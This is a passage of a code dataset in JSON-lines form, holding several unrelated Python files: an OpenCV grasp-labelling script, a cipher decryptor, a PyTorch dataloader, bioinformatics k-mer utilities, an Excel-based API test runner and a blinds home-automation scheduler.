cv2.destroyAllWindows()\n if usr_input == 2424832:\n print('left side is better')\n left = mid\n elif usr_input == 2555904:\n print('right side is 
better')\n right = mid\n else:\n print('same quality')\n data[0] = ci[0]\n better_side = mid\n for n in range(mid, len(results)):\n if results[n, 0] > ci[0]:\n better_side = n\n break\n results[better_side:, 0] += 1\n new_results = np.concatenate([results[:mid], [data], results[mid:]])\n break\n\n elif usr_input == 2424832:\n # case 32\n print('current pose is the best so far')\n data[0] = ci[0] + 1 # update grasp quality\n new_results = np.concatenate([results, [data]]) # add current grasp to the array\n else:\n # case 33\n print('current pose is equally good as the best one')\n data[0] = ci[0]\n new_results = np.concatenate([results, [data]])\n\n elif usr_input == 2555904:\n print('right side is better')\n # case 1\n results[:, 0] += 1 # update grasp quality of all grasps that are better that current grasp\n new_results = np.concatenate([[data], results]) # add current grasp to the array\n else:\n # case 2\n print('same grasp quality')\n new_results = np.concatenate([[data], results])\n\n results = new_results\n print(results.shape)\n np.savetxt('grasp_feature_study.txt', results, fmt='%1.4f')\n return results\n\n\nif __name__ == '__main__':\n path = os.path.dirname(os.getcwd())\n img_rgb = 'spoon3.png'\n img_mask = 'spoon3_mask.png'\n I = cv2.imread(os.path.join(path, 'pictures', img_rgb))\n Im = cv2.imread(os.path.join(path, 'pictures', img_mask))\n Ip = get_object_pixels(Im[:, :, 0])\n while True:\n sample_indices = random.sample(range(len(Ip)), 20)\n sample_check = np.copy(Im)*255\n for ii in sample_indices:\n cv2.circle(sample_check, (Ip[ii][1], Ip[ii][0]), 2, (0, 0, 255))\n cv2.imshow('sample check', sample_check)\n print('press k if the sample is good')\n xx = cv2.waitKey(0)\n cv2.destroyAllWindows()\n if xx == ord('k') or xx == ord('K'):\n break\n sample_angles = np.arange(-90, 90, 10)\n\n gf_data = gather_data(Im, Ip, sample_indices, sample_angles)\n np.savetxt('grasp_feature_study.txt', gf_data, fmt='%1.4f')\n\n # arr = np.arange(9).reshape((3, 3))\n # new_arr = np.concatenate([arr[:2], [[8,3,3]], arr[2:]])\n # print(new_arr)\n\n # path = os.path.dirname(os.getcwd())\n # img_rgb = 'spoon3.png'\n # img_mask = 'spoon3_mask.png'\n # I = cv2.imread(os.path.join(path, 'pictures', img_rgb))\n # print('press a key')\n # cv2.imshow('test', I)\n # c = cv2.waitKeyEx(0)\n # print('you pressed', c)\n # if c == 2621440:\n # print('you pressed down')\n # if c == 2424832:\n # print('you pressed left')\n # if c == 2555904:\n # print('you pressed '\n # 'right')","sub_path":"daniel/Grasp_Tuning/code/grasp_feature_test.py","file_name":"grasp_feature_test.py","file_ext":"py","file_size_in_byte":9837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"119494283","text":"def Decryption(string): #Encrypted String -> string\r\n\t\r\n\tfile = open(\"Library/decrypted.txt\",\"r\") #Retrieves a string of letters, which are in order: abcdefg...\r\n\tDC = file.read()\r\n\tfile.close()\r\n\t\r\n\tfile = open(\"Library/encrypted.txt\",\"r\") #Retrieves a string of letters, which are in random order: the encryption key\r\n\tEC = file.read()\r\n\tfile.close()\r\n\t\r\n\tstringLength = len(string) #Length of the string\r\n\tlength = len(EC) #Number of characters in the key\r\n\tindex = 0 #Sets index to 0, in order to start from the first character\r\n\tdecryptedString = \"\"\r\n\taddition = 0\r\n\r\n\twhile index != stringLength: #Will repeat until entire string is handeled\r\n\r\n\t\tstringLetter = string[index] #Takes the index letter\r\n\r\n\t\tspot = 
EC.index(stringLetter) #Finds the index of the letter in the key\r\n\r\n\t\tdecryptedLetter = DC[(spot + addition) % length] #Finds the letter in the order that corresponds to the index of the letter in the key. Reverses encryption\r\n\r\n\t\tindex = index + 1 #Continues to the next letter\r\n\t\taddition = addition - 1 #Allows reversing the encryption\r\n\r\n\t\tdecryptedString = decryptedString + decryptedLetter #Adds the decrypted letter to the string\r\n\t\r\n\treturn(decryptedString) #Returns the decrypted string \r\n\t\r\n\r\nprint(\"\\nString Decryption\")\r\nprint(\"-----------------\")\r\nprint(Decryption(input(\"Text:\")))\r\n","sub_path":"Decryption.py","file_name":"Decryption.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"16514657","text":"\"\"\"create dataset and dataloader\"\"\"\nimport logging\nimport torch\nimport torch.utils.data\n\n\ndef create_dataloader(dataset, dataset_opt, opt=None, sampler=None):\n phase = dataset_opt['phase']\n if phase == 'train':\n num_workers = dataset_opt['n_workers'] * len(opt['gpu_ids'])\n batch_size = dataset_opt['batch_size']\n # shuffle = True\n shuffle = dataset_opt['use_shuffle']\n return torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=shuffle,\n num_workers=num_workers, sampler=sampler,\n pin_memory=True)\n else:\n batch_size = dataset_opt['batch_size']\n # shuffle = dataset_opt['use_shuffle']\n shuffle = False\n return torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0,\n pin_memory=False)\n\n\ndef create_dataset(opt,dataset_opt):\n mode = dataset_opt['mode']\n # datasets for image restoration\n if mode == 'SIEN_train':\n from data.SIEN_dataset import DatasetFromFolder as D\n\n dataset = D(upscale_factor=opt['scale'], data_augmentation=dataset_opt['augment'],\n group_file=dataset_opt['filelist'],\n patch_size=dataset_opt['IN_size'], black_edges_crop=False, hflip=True, rot=True)\n\n elif mode == 'SIEN_val':\n from data.SIEN_dataset import DatasetFromFolder as D\n dataset = D(upscale_factor=opt['scale'], data_augmentation=False,\n group_file=dataset_opt['filelist'],\n patch_size=None, black_edges_crop=False, hflip=False, rot=False)\n\n else:\n raise NotImplementedError('Dataset [{:s}] is not recognized.'.format(mode))\n\n\n logger = logging.getLogger('base')\n logger.info('Dataset [{:s} - {:s}] is created.'.format(dataset.__class__.__name__,\n dataset_opt['name']))\n return dataset\n","sub_path":"data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"278873972","text":"N, M = map(int, input().split())\nA = list(map(int, input().split()))\n\nA = sorted(A)\n\n#番兵追加\nA.insert(0, 0)\nA.append(N+1)\n\nans = 0\nwhite_box = []\nfor i in range(M+1):\n box_length = A[i+1]-A[i]-1\n if (box_length != 0):\n white_box.append(box_length)\n\ntry:\n k = min(white_box)\nexcept ValueError:\n print(ans)\n exit()\n\nfor j in white_box:\n ans += -(-j // k)\nprint(ans)\n","sub_path":"python/Stamp.py","file_name":"Stamp.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"368903200","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 31 16:50:13 2017\n\n@author: Owner\n\"\"\"\n#Functions\n############################################################################### 
\nimport random\nimport math\nimport networkx as nx\n\ndef WriteResults(list):\n \"\"\"writes out elements of a list to text\"\"\"\n with open(\"Output.txt\", \"w\") as text_file:\n for j in range(len(list)):\n text_file.write(str(list[j]) + \"\\n\") \n text_file.close()\n \ndef readFasta(fileName):\n f = open(fileName)\n seqs = {}\n for line in f:\n line = line.rstrip()\n if line[0] == '>':\n words = line.split()\n name = words[0][1:]\n seqs[name] = ''\n else:\n seqs[name] = seqs[name] + line\n f.close()\n return seqs\n \ndef readSequenceArray(fileName):\n f = open(fileName)\n seqs = []\n for line in f:\n line = line.rstrip()\n seqs.append(line)\n f.close()\n return seqs\n \ndef readGapSeparatedSequenceArray(fileName):\n f = open(fileName)\n seqs = []\n for line in f:\n line = line.rstrip()\n lines = line.split(' ')\n for l in lines:\n seqs.append(l)\n f.close()\n return seqs\n \ndef getLongestSequenceInFasta(dic):\n maxLength = 0\n longest = 0\n for k, v in dic.items():\n longest = len(v)\n if longest > maxLength:\n maxLength = longest\n return maxLength\n \ndef getsequenceLengthsInFasta(dic):\n sequenceL = []\n for k, v in dic.items():\n sequenceL.append(len(v)) \n return sequenceL \n\ndef getLengthsDicInFasta(dic):\n sequenceL = {}\n for k, v in dic.items():\n l = len(v)\n sequenceL.update({k:l}) \n return sequenceL \n\n\ndef reverseComplement(s):\n \"\"\"computes the reverse complement of a DNA string\"\"\"\n complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}\n t = ''\n for base in s:\n t = complement[base] + t\n return t\n\n\ndef create_dna(n, alphabet='acgt'):\n \"\"\"creates a random string of DNA\"\"\"\n return ''.join([random.choice(alphabet) for i in range(n)])\n \ndef naive(p, t):\n #Given a DNA sequence (t) search for the number of occurences of an exact \n #match (p)\n occurrences = []\n for i in range(len(t) - len(p) + 1): # loop over alignments\n match = True\n for j in range(len(p)): # loop over characters\n if t[i+j] != p[j]: # compare characters\n match = False\n break\n if match:\n occurrences.append(i) # all chars matched; record\n return occurrences \n \ndef kmerCount(k,t):\n #Counts the number if occurences if a k-mer in a dna sequence (naive)\n d = {}\n occurrences = []\n count = 0\n for j in range(len(t) - k + 1):\n p = t[j:j+k]\n for i in range(len(t) - len(p) + 1): \n if(p == t[i: i + len(p)]):\n count+= 1\n occurrences.append(i) \n d.update({p:occurrences})\n occurrences = []\n return d\n \ndef patternCount(t,p):\n #Counts the number if occurences if a k-mer in a dna sequence (naive)\n count = 0\n for i in range(len(t) - len(p) + 1): \n if(p == t[i: i + len(p)]):\n count+= 1 \n return count\n\ndef approximatePatternCount(text,pattern,d):\n '''count instances of pattern with at most d mismatches'''\n count = 0\n l = []\n for i in range(len(text) - len(pattern) + 1):\n p = text[i: i + len(pattern)]\n if(hammingDistance(pattern,p) <= d):\n count = count + 1\n l.append(i)\n return count\n \ndef approximatePatternMatch(text,pattern,d):\n '''count instances of pattern with at most d mismatches'''\n l = []\n for i in range(len(text) - len(pattern) + 1):\n p = text[i: i + len(pattern)]\n if(hammingDistance(pattern,p) <= d):\n \n l.append(i)\n return l\n \ndef readGenome(filename):\n genome = ''\n with open(filename, 'r') as f:\n for line in f:\n # ignore header line with genome information\n if not line[0] == '>':\n genome += line.rstrip()\n return genome\n \ndef getSequencingReads(filename):\n reads = []\n with open(filename, 'r') as f:\n for line in f:\n 
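# one sequencing read per line; rstrip() removes the trailing newline\n            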
reads.append(line.rstrip())\n return reads\n \n#Hamming Distance - Problem 1\ndef hammingDistance(s1, s2):\n \"\"\"Compute the Hamming distance between two strings\"\"\"\n #test that they have values\n if len(s1) == 0: return len(s2)\n if len(s2) == 0: return len(s1) \n #Convert the int lists to strings\n str1 = ''.join(str(e) for e in s1)\n str2 = ''.join(str(e) for e in s2) \n #Counter set at zero\n hamDist = 0\n for i in range(0, len(str1)):\n #If the values at the specified index aren't equal\n if str1[i] != str2[i]:\n #increment\n hamDist += 1 \n #Return the total count.\n return hamDist\n \ndef distanceBetweenPatternAndStrings(pattern,dna):\n \"\"\"Computes the the sum total distance between kmer and a list of DNA strings\"\"\"\n k = len(pattern)\n distance = 0\n totalDistance = 0\n for text in dna:\n hd = float('inf')\n # generate all kmer pattern' in text\n kmers = kmersFromDNA(text,k)\n for j in kmers:\n distance = hammingDistance(pattern,j)\n if hd > distance:\n hd = distance\n totalDistance += hd \n return totalDistance\n \n \n \n \ndef medianString(dna,k):\n distance = float('inf') \n for i in range(int(4**k)): \n pattern = NumberToPattern(i,k)\n if distance > distanceBetweenPatternAndStrings(pattern,dna):\n distance = distanceBetweenPatternAndStrings(pattern,dna)\n median = pattern \n return median\n\ndef LastSymbol( pattern ):\n return pattern[ -1: ]\n\ndef skew(sequence):\n \"\"\"Find a position in a genome where the skew diagram attains a minimum.\"\"\"\n c = 0\n g = 0\n min_skew = 0\n skew_list = []\n index = 0\n for i in sequence:\n index += 1\n if i == 'C':\n c += 1\n if i == 'G':\n g += 1\n skew = g-c\n if skew < min_skew:\n skew_list = [index]\n min_skew = skew\n if skew == min_skew and index not in skew_list:\n skew_list.append(index) \n print(skew_list)\n\ndef SymbolToNumber( symbol ):\n retVal = 10000\n if symbol == 'A':\n retVal = 0 \n elif symbol == 'C':\n retVal = 1\n elif symbol == 'G':\n retVal = 2\n elif symbol == 'T':\n retVal = 3\n return retVal\n\ndef NumberToSymbol( index ):\n symbol = 'Z'\n if index == 0:\n symbol = 'A'\n elif index == 1:\n symbol = 'C'\n elif index == 2:\n symbol = 'G'\n elif index == 3:\n symbol = 'T'\n return symbol\n\ndef PatternToNumber( pattern ):\n \"\"\"Convert a DNA string to a number\"\"\"\n if pattern == \"\":\n return 0\n if len( pattern ) > 0:\n subStrEndIndex = len( pattern ) - 1\n else:\n subStrEndIndex = 0\n prunedPattern = pattern[ 0: subStrEndIndex ]\n lastSymbol = LastSymbol( pattern )\n #The '4 *' allows the resulting numbers to be unique according to their symbol's positions.\n return 4 * PatternToNumber( prunedPattern ) + SymbolToNumber( lastSymbol )\n\ndef NumberToPattern( index, k ):\n \"\"\"Convert an integer to its corresponding DNA string.\"\"\"\n if k == 1:\n return NumberToSymbol( index )\n prefixIndex = index // 4\n remainder = index % 4\n prefixPattern = NumberToPattern( prefixIndex, k - 1 )\n symbol = NumberToSymbol( remainder )\n return prefixPattern + symbol \n\ndef computingFrequencies(text,k):\n \"\"\"Compute frequency array of kmers\"\"\"\n frequencyArray = []\n for i in range(int(4**k)): \n frequencyArray.append(0) \n for i in range(len(text)- k + 1):\n pattern = text[i:i+k]\n j = PatternToNumber(pattern)\n frequencyArray[j] = frequencyArray[j] + 1\n return frequencyArray\n \ndef frequentWords(text,k):\n \"\"\"Find the most frequent k-mers in a string\"\"\"\n frequentPatterns = []\n count = count = [0] * (len(text) - k + 1)\n for i in range(len(text) - k + 1):\n pattern = text[i:i+k]\n count[i] = 
patternCount(text,pattern)\n maxCount = max(count)\n for i in range(len(text) - k + 1):\n if(count[i] == maxCount):\n frequentPatterns.append(text[i:i+k])\n fp = set(frequentPatterns)\n result = []\n for i in fp:\n result.append(i)\n return result\n\ndef fasterFrequentWords(text,k):\n \"\"\"Find the most frequent k-mers in a string\"\"\"\n frequentPatterns = []\n frequencyArray = computingFrequencies(text,k)\n maxCount = max(frequencyArray)\n for i in range(int(4**k)): \n if frequencyArray[i] == maxCount:\n pattern = NumberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns \n\ndef clumpFinding(genome,k,t,L):\n \"\"\"Find patterns forming clumps in a string.\"\"\"\n frequentPatterns = [] \n clump = [0] * int(4**k)\n for i in range(len(genome) - L):\n text = genome[i:i + L]\n frequencyArray = computingFrequencies(text,k)\n for index in range(int(4**k)): \n if(frequencyArray[index] >= t):\n clump[index] = 1\n for i in range(int(4**k)):\n if clump[i] == 1:\n pattern = NumberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns\n \ndef neighbors(pattern,d):\n \"\"\"The d-neighborhood Neighbors(Pattern, d) is the set of all k-mers whose Hamming distance from Pattern does not exceed d.\"\"\"\n x = ['A','C','G','T']\n if d == 0:\n return pattern\n if len(pattern) == 1:\n return ['A','C','G','T']\n neighborhood = []\n suffixNeighbors = neighbors(suffix(pattern),d)\n for text in suffixNeighbors:\n if hammingDistance(suffix(pattern),text) < d:\n for nucleotide in x:\n p = nucleotide + text\n neighborhood.append(p)\n else:\n p = firstSymbol(pattern) + text\n neighborhood.append(p)\n return neighborhood\n \ndef suffix(pattern):\n return pattern[1:len(pattern)]\n \ndef prefix(pattern):\n return pattern[0:len(pattern) -1]\n\ndef firstSymbol(pattern):\n return pattern[0]\n \ndef immediateNeighbors(pattern):\n neighborhood = []\n for i in range(pattern):\n symbol = pattern[i]\n for j in range(pattern):\n if j != symbol:\n pattern[i] = j\n neighbor = pattern\n neighborhood.append(neighbor)\n return neighborhood\n\ndef frequentWordsWithMismatches(text,k,d):\n \"\"\"Find the most frequent k-mers with mismatches in a string.\"\"\"\n frequentPatterns = [] \n frequencyArray = [] \n close = []\n for i in range(int(4**k)):\n frequencyArray.append(0)\n close.append(0)\n for i in range(len(text) - k):\n neighborhood = neighbors(text[i:i+k],d)\n for pattern in neighborhood:\n index = PatternToNumber(pattern)\n close[index] = 1\n for i in range(int(4**k)):\n if(close[i] == 1):\n pattern = NumberToPattern(i,k)\n frequencyArray[i] = approximatePatternCount(text,pattern,d) \n maxCount = max(frequencyArray)\n for i in range(int(4**k)):\n if frequencyArray[i] == maxCount:\n pattern = NumberToPattern(i,k)\n frequentPatterns.append(pattern)\n return frequentPatterns \n \ndef motifEnumeration(dna,k,d):\n \"\"\"Gets kmers from all DNA strings, searches them for kmers with at most d mistmatches then looks for d-neighbors that appear on all dna strings\"\"\"\n patterns = []\n primePatterns = []\n counter = 0\n kmers = kmersFromDNAList(dna,k) \n # we get all neighbors of all the kmers of all dna strings\n for kmer in kmers:\n n = neighbors(kmer,d)\n for i in n:\n primePatterns.append(i)\n #now we search for all prime patterns in all string with at most d mismatches\n for j in primePatterns:\n for string in dna:\n l = approximatePatternMatch(string,j,d)\n if len(l) > 0:\n counter += 1\n if counter >= len(dna):\n patterns.append(j) \n counter = 0\n counter = 0 \n return set(patterns)\n 
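\n# Example use of motifEnumeration (a sketch, assuming the classic textbook sample input;\n# the function returns a set, so member order is unspecified):\n#   dna = ['ATTTGGC', 'TGCCTTA', 'CGGTATC', 'GAAAATT']\n#   print(motifEnumeration(dna, 3, 1))  # expected: {'ATA', 'ATT', 'GTT', 'TTT'}\n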
\ndef generateKmers(k):\n    \"\"\"Generate all possible kmers of length k\"\"\"\n    kmers = []\n    for i in range(int(4**k)):\n        pattern = NumberToPattern(i,k)\n        kmers.append(pattern)\n    return kmers\n\ndef kmersFromDNA(d,k):\n    \"\"\"Returns a list of k-mers from a string of DNA\"\"\"\n    kmers = []\n    for i in range(len(d) - k + 1): \n        kmers.append(d[i:i+k]) \n    return kmers\n\ndef kmersFromDNAList(dna,k):\n    kmers = []\n    for i in dna:\n        l = kmersFromDNA(i,k)\n        for j in l:\n            kmers.append(j)\n    return kmers\n\ndef searchFrequentWords(d,l):\n    max = 0\n    key = \"\"\n    value = 0\n    r = {}\n    for k,v in d.items():\n        w = kmerCount(l,v)\n        #get max\n        for k,v in w.items():\n            if len(v) > max:\n                key = k\n                value = v\n                max = len(v)\n        r.update({key:value})\n    return r\n\ndef genomePath(d):\n    seq = d[0]\n    for i in d[1:]:  # skip d[0]; append only the last symbol of each following k-mer\n        seq += i[-1]\n    return seq\n\ndef graphExample():\n    G=nx.Graph()\n    G.add_node(\"spam\")\n    G.add_edge(1,2)\n    G.add_edge(2,3)\n    return G\n\ndef kmerCompositionLexigographic(s,k):\n    kmers = kmersFromDNA(s,k)\n    kmers.sort()\n    return kmers\n\ndef kmerGraph(s,k):\n    d = kmersFromDNA(s,k)\n    G=nx.DiGraph()\n    for i in d:\n        G.add_node(i)\n        for j in d:\n            if suffix(i) == prefix(j):\n                G.add_edge(i,j)\n    return G\n\ndef kmerdeBruijnGraph(s,k):\n    d = kmersFromDNA(s,k)\n    G=nx.DiGraph()\n    for i in d:\n        G.add_node(prefix(i))\n        for j in d:\n            if suffix(i) == prefix(j):\n                G.add_edge(prefix(i),suffix(i))\n    G.add_node(suffix(d[len(d)- 1]))\n    return G\n\n\n###############################################################################\n","sub_path":"ProteoGenomics/Genomics/Chapter1_3.py","file_name":"Chapter1_3.py","file_ext":"py","file_size_in_byte":14365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"371585340","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/11/6 14:41\n# @Software: PyCharm Community Edition\n# @Author : Ada\n# @File : do_excel.py\n# handles reading from and writing to the Excel test-case workbook\nimport openpyxl\n\nfrom API.API_7.common import http_request\n\n\"\"\"\nTest-case class; every test case is an instance of it\n\"\"\"\nclass Case:\n    def __init__(self):\n        self.case_id=None\n        self.title=None\n        self.url=None\n        self.data=None\n        self.method=None\n        self.expected=None\n        self.actual=None\n        self.result=None\n        self.sql=None\nclass DoExcel:\n\n    def __init__(self,file_name,sheet_name):\n        self.file_name = file_name\n        self.sheet_name = sheet_name\n        self.workbook = openpyxl.load_workbook(file_name)\n        self.sheet = self.workbook[sheet_name]\n    def get_cases(self):\n        max_row=self.sheet.max_row  # number of the last used row\n\n        cases=[]  # list that holds all test cases\n        for r in range(2,max_row+1):\n\n            case=Case()  # one instance per worksheet row\n            case.case_id=self.sheet.cell(row=r,column=1).value\n            case.title=self.sheet.cell(row=r, column=2).value\n            case.url=self.sheet.cell(row=r, column=3).value\n            case.data=self.sheet.cell(row=r, column=4).value\n            case.method=self.sheet.cell(row=r, column=5).value\n            case.expected=self.sheet.cell(row=r, column=6).value\n            case.sql=self.sheet.cell(row=r,column=9).value  # SQL to execute\n            cases.append(case)\n\n        self.workbook.close()\n        return cases  # return the list of Case objects\n\n    def write_result(self,row,actual,result):\n        sheet=self.workbook[self.sheet_name]\n        sheet.cell(row,7).value= actual\n        sheet.cell(row,8).value = result\n        self.workbook.save(filename=self.file_name)\n        self.workbook.close()\n\nif __name__==\"__main__\":\n    from API.API_3.common import contants\n    do_excel=DoExcel(contants.case_file,sheet_name='login')\n    cases=do_excel.get_cases()\n    http_request= http_request.HTTPRequest()\n    for case in cases:\n        # print(case.case_id)\n        # print(case.title)\n        # print(case.url)\n        # print(case.data)\n
        # print(case.method)\n        # print(case.expected)\n        print(case.__dict__)\n        print(type(case.data))\n        resp=http_request.request(case.method,case.url,case.data)\n        print(resp.status_code)\n        print(resp.text)  # response text\n        resp_dict = resp.json()  # response parsed into a dict\n        print(resp_dict)\n\n        actual=resp.text\n        if case.expected == actual:  # check whether the expected and actual results match\n            do_excel.write_result(case.case_id+1,actual,'PASS')\n\n        else:\n            do_excel.write_result(case.case_id+1,actual,'FAIL')","sub_path":"common/do_excel.py","file_name":"do_excel.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"138081890","text":"\n\nfrom xai.brain.wordbase.nouns._cure import _CURE\n\n#class header\nclass _CURED(_CURE, ):\n\tdef __init__(self,): \n\t\t_CURE.__init__(self)\n\t\tself.name = \"CURED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"cure\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_cured.py","file_name":"_cured.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"180525646","text":"\n\nfrom xai.brain.wordbase.nouns._penguin import _PENGUIN\n\n#class header\nclass _PENGUINS(_PENGUIN, ):\n\tdef __init__(self,): \n\t\t_PENGUIN.__init__(self)\n\t\tself.name = \"PENGUINS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"penguin\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_penguins.py","file_name":"_penguins.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"299662383","text":"import datetime\nimport _thread\nimport time\n\nfrom rx import Observable\nfrom rx import operators as ops\nfrom rx.scheduler import EventLoopScheduler\nfrom smart_home.BlindAction import BlindAction, Blind\nfrom relay import GpioClient\nfrom threading import Timer\n\nimport schedule\n\n\nclass BlindsService(object):\n    def __init__(self):\n        self.__gpioClient = GpioClient.GpioClient()\n        self.__buttonState = {}\n        self.__blindUp = {}\n        self.__blindUpTimer = {}\n        self.__blockTimer = None\n        self.__scheduler = EventLoopScheduler()\n        self.__relayActiveActions = {\n            BlindAction.Blind1Up: self.__gpioClient.blind1UpStart,\n            BlindAction.Blind2Up: self.__gpioClient.blind2UpStart,\n            BlindAction.Blind3Up: self.__gpioClient.blind3UpStart,\n            BlindAction.Blind4Up: self.__gpioClient.blind4UpStart,\n            BlindAction.Blind5Up: self.__gpioClient.blind5UpStart,\n            BlindAction.AllUp: self.__gpioClient.allBlindsUpStart,\n            BlindAction.AllUp2: self.__gpioClient.allBlindsUpStart,\n            BlindAction.Blind1Down: self.__gpioClient.blind1DownStart,\n            BlindAction.Blind2Down: self.__gpioClient.blind2DownStart,\n            BlindAction.Blind3Down: self.__gpioClient.blind3DownStart,\n            BlindAction.Blind4Down: self.__gpioClient.blind4DownStart,\n            BlindAction.Blind5Down: self.__gpioClient.blind5DownStart,\n            BlindAction.AllDown: self.__gpioClient.allBlindsDownStart,\n            BlindAction.AllDown2: self.__gpioClient.allBlindsDownStart\n        }\n        self.__relayInactiveActions = {\n            BlindAction.Blind1Up: self.__gpioClient.blind1UpStop,\n            BlindAction.Blind2Up: self.__gpioClient.blind2UpStop,\n            BlindAction.Blind3Up: self.__gpioClient.blind3UpStop,\n            BlindAction.Blind4Up: self.__gpioClient.blind4UpStop,\n            BlindAction.Blind5Up: self.__gpioClient.blind5UpStop,\n            BlindAction.AllUp: self.__gpioClient.allBlindsUpStop,\n            BlindAction.AllUp2: self.__gpioClient.allBlindsUpStop,\n            BlindAction.Blind1Down: self.__gpioClient.blind1DownStop,\n            
BlindAction.Blind2Down: self.__gpioClient.blind2DownStop,\n BlindAction.Blind3Down: self.__gpioClient.blind3DownStop,\n BlindAction.Blind4Down: self.__gpioClient.blind4DownStop,\n BlindAction.Blind5Down: self.__gpioClient.blind5DownStop,\n BlindAction.AllDown: self.__gpioClient.allBlindsDownStop,\n BlindAction.AllDown2: self.__gpioClient.allBlindsDownStop\n }\n\n _thread.start_new_thread(self.__configureAutomations, ())\n\n def addSwitch(self,\n observable: Observable,\n blindAction: BlindAction,\n blind: Blind):\n # Initialize states\n self.__buttonState[blindAction] = False\n self.__blindUp[blind] = False\n\n # Add a handler to the switch state\n observable.pipe(ops.observe_on(self.__scheduler)).subscribe(\n lambda active: self.__pressedHandler(blindAction, blind, active))\n\n def __configureAutomations(self):\n # Special rules\n schedule.every().friday.at(\"06:56\").do(self.__gpioClient.block)\n (schedule.every().friday.at(\"07:05\")\n .do(self.__blockAutomationWhenAllAreUp))\n\n # Never close automatically\n schedule.every().day.at(\"18:26\").do(self.__gpioClient.block)\n (schedule.every().day.at(\"18:34\")\n .do(self.__blockAutomationWhenAllAreUp))\n\n # Do not open on the weekend.\n schedule.every().saturday.at(\"06:56\").do(self.__gpioClient.block)\n (schedule.every().saturday.at(\"07:04\")\n .do(self.__blockAutomationWhenAllAreUp))\n schedule.every().sunday.at(\"06:56\").do(self.__gpioClient.block)\n (schedule.every().sunday.at(\"07:04\")\n .do(self.__blockAutomationWhenAllAreUp))\n\n # Open completly on weekdays.\n schedule.every().monday.at(\"07:06\").do(self.__allBlindsUp)\n schedule.every().tuesday.at(\"07:06\").do(self.__allBlindsUp)\n schedule.every().wednesday.at(\"07:06\").do(self.__allBlindsUp)\n schedule.every().thursday.at(\"07:06\").do(self.__allBlindsUp)\n # schedule.every().friday.at(\"07:06\").do(self.__allBlindsUp)\n\n # Open slightly on weekends.\n schedule.every().saturday.at(\"09:00\").do(self.__openSlightly)\n schedule.every().sunday.at(\"09:00\").do(self.__openSlightly)\n\n # Close at 22:00 on weekdays\n schedule.every().sunday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().monday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().tuesday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().wednesday.at(\"22:00\").do(self.__allBlindsDown)\n schedule.every().thursday.at(\"22:00\").do(self.__allBlindsDown)\n\n # Close at 00:00 on weekends\n schedule.every().friday.at(\"00:00\").do(self.__allBlindsDown)\n schedule.every().saturday.at(\"00:00\").do(self.__allBlindsDown)\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n def __openSlightly(self):\n self.__unblockBlinds()\n self.__gpioClient.allBlindsUpStart()\n\n # Virtually press the button for 0.3 seconds\n t = Timer(0.4, self.__gpioClient.allBlindsUpStop)\n t.start()\n\n self.__blockBlinds()\n\n def __allBlindsUp(self):\n self.__unblockBlinds()\n\n # Activate relay\n self.__gpioClient.allBlindsUpStart()\n time.sleep(0.5)\n self.__gpioClient.allBlindsUpStop()\n time.sleep(0.5)\n self.__gpioClient.allBlindsUpStart()\n\n # Virtually press the button for 5 seconds\n t = Timer(5.0, self.__gpioClient.allBlindsUpStop)\n t.start()\n\n # Store all blinds are up\n for group in Blind:\n self.__blindUp[group] = True\n\n self.__blockBlinds()\n\n def __allBlindsDown(self):\n self.__unblockBlinds()\n\n # Store all blinds are down\n for group in Blind:\n self.__blindUp[group] = False\n\n # Activate relay\n self.__gpioClient.allBlindsDownStart()\n time.sleep(0.5)\n 
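# brief release between the two virtual presses; the second press is held for 5 s via the Timer below\n        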
self.__gpioClient.allBlindsDownStop()\n time.sleep(0.5)\n self.__gpioClient.allBlindsDownStart()\n\n # Virtually press the button for 5 seconds\n t = Timer(5.0, self.__gpioClient.allBlindsDownStop)\n t.start()\n\n def __pressedHandler(\n self,\n blindAction: BlindAction,\n blind: Blind,\n active: bool):\n # Button State did not change ... skipping\n if self.__buttonState[blindAction] == active:\n return\n\n # Button State changed ... save it\n self.__buttonState[blindAction] = active\n\n # Button is pressed\n if active:\n self.__unblockBlinds()\n\n # Activate relay\n self.__handleRelayActive(blindAction, blind)\n\n # Button is released\n else:\n # Deactivate relay\n self.__handleRelayInactive(blindAction, blind)\n\n self.__blockBlinds()\n\n def __blockBlinds(self):\n # Block Wind/Time automation when all blinds are up\n # Dispose existing timer\n if self.__blockTimer is not None:\n self.__blockTimer.cancel()\n\n # Block the automation after 70 seconds\n self.__blockTimer = Timer(70.0, self.__blockAutomationWhenAllAreUp)\n self.__blockTimer.start()\n\n def __unblockBlinds(self):\n # Dispose existing timer\n if self.__blockTimer is not None:\n self.__blockTimer.cancel()\n\n # Unblock blinds\n self.__gpioClient.unblock()\n 